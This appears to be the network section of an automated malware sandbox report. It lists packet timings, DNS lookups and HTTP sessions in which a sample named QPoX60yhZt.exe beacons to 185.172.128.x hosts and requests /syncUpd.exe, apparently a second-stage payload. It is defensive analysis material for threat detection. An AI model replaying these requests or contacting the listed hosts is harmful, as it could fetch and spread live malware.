Apr 26, 2024 10:27:05.637517929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637531042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637543917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637550116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637557983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637572050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637604952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637640953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637666941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637722015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637742996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637757063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637763023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637794018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637799978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637814045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637849092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637878895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637928963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637953997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637964964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637968063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638005972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638008118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638022900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638036013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638056993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638097048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638124943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638133049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638159990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638185978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638206959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638458967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638472080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638498068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638499975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638511896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638526917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638535023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638565063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638590097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638645887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638681889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638684034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638756990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638788939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638827085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638842106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638854980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638875008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638900995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638926983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638942957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.638968945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638983011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.638994932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639003992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639008045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639029980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639055967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639094114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639095068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639177084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639214993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639228106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639241934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639260054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639276981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639291048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639305115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639323950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639369965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639408112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639409065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639422894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639437914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639460087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639461040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639477968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639497042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639503956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639528990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639539957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639565945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639612913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639637947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639661074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639677048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639698029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639734983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639750004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639770031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639832973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639847040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639859915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639873981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639873981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639889002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639892101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639914989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639925957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.639971018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639983892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.639997005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640010118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640012980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640028000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640057087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640070915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640089989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640115976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640131950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640151978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640177965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640192986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640214920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640219927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640233994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640254021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640331984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640346050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640357971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640373945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640389919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640417099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640420914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640420914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640431881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640434027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640474081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640487909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640516043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640561104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640574932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640595913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640613079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640640020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640654087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640693903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640734911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640748978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640784025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640784025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640799046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640825033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640840054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640868902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640882015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640902042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640943050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640958071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640971899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.640974998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.640997887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641005039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641104937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641119003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641138077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641149044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641185999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641211033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641236067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641269922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641288996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641340017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641354084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641371965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641383886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641398907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641412020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641421080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641437054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641448021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641491890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641527891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641571045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641590118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641612053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641657114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641665936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641673088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641689062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641699076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641715050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641726971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641803980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641818047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641829967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641841888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641840935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641856909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641868114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641899109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641923904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641937017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641949892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641963005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641972065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.641977072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.641990900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642000914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642018080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642030954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642079115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642116070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642119884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642159939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642174959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642198086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642204046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642244101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642255068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642270088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642283916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642303944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642307997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642347097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642437935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642483950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642498016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642517090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642610073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642647982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642662048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642676115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642712116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642802954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642816067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642829895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642848969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642852068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642865896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642884016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642901897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642916918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.642936945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.642966986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643002987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.643081903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643098116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643110037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643134117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.643136978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643171072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.643176079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643244982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643260002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643281937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.643284082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643299103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643311977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643316984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.643326998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643340111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643347979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.643373966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.643412113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643441916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643455982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643472910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.643477917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643515110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.643517017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643532991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643546104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643567085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.643642902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643657923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.643676996 CEST	49734	80	192.168.2.4	176.97.76.106

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 10:27:01.029361010 CEST	192.168.2.4	1.1.1.1	0x818d	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:02.042937040 CEST	192.168.2.4	1.1.1.1	0x818d	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:03.060381889 CEST	192.168.2.4	1.1.1.1	0x818d	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:14.735517979 CEST	192.168.2.4	1.1.1.1	0xf319	Standard query (0)	svc.iolo.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:20.968919992 CEST	192.168.2.4	1.1.1.1	0x5727	Standard query (0)	download.iolo.net	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:53.027717113 CEST	192.168.2.4	1.1.1.1	0x2ffd	Standard query (0)	westus2-2.in.applicationinsights.azure.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 10:27:03.474442959 CEST	1.1.1.1	192.168.2.4	0x818d	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:03.474503994 CEST	1.1.1.1	192.168.2.4	0x818d	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:03.474539995 CEST	1.1.1.1	192.168.2.4	0x818d	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:14.877525091 CEST	1.1.1.1	192.168.2.4	0xf319	No error (0)	svc.iolo.com		20.157.87.45	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:17.385302067 CEST	1.1.1.1	192.168.2.4	0x41a2	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 10:27:17.385302067 CEST	1.1.1.1	192.168.2.4	0x41a2	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:21.097201109 CEST	1.1.1.1	192.168.2.4	0x5727	No error (0)	download.iolo.net	iolo0.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 10:27:21.097201109 CEST	1.1.1.1	192.168.2.4	0x5727	No error (0)	iolo0.b-cdn.net		195.181.163.195	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:27:53.446485996 CEST	1.1.1.1	192.168.2.4	0x2ffd	No error (0)	westus2-2.in.applicationinsights.azure.com	westus2-2.in.ai.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 10:27:53.446485996 CEST	1.1.1.1	192.168.2.4	0x2ffd	No error (0)	westus2-2.in.ai.monitor.azure.com	westus2-2.in.ai.privatelink.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 10:27:53.446485996 CEST	1.1.1.1	192.168.2.4	0x2ffd	No error (0)	westus2-2.in.ai.privatelink.monitor.azure.com	gig-ai-prod-westus2-0.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.172.128.90	80	7284	C:\Users\user\Desktop\QPoX60yhZt.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:26:56.207350969 CEST	204	OUT	GET /cpa/ping.php?substr=one&s=ab&sub=0 HTTP/1.1 Host: 185.172.128.90 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 10:26:58.481426954 CEST	148	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 08:26:56 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 31 Data Ascii: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.172.128.228	80	7284	C:\Users\user\Desktop\QPoX60yhZt.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:26:58.734523058 CEST	190	OUT	GET /ping.php?substr=one HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 10:26:58.974783897 CEST	147	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 08:26:58 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	185.172.128.59	80	7284	C:\Users\user\Desktop\QPoX60yhZt.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:26:59.228759050 CEST	181	OUT	GET /syncUpd.exe HTTP/1.1 Host: 185.172.128.59 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
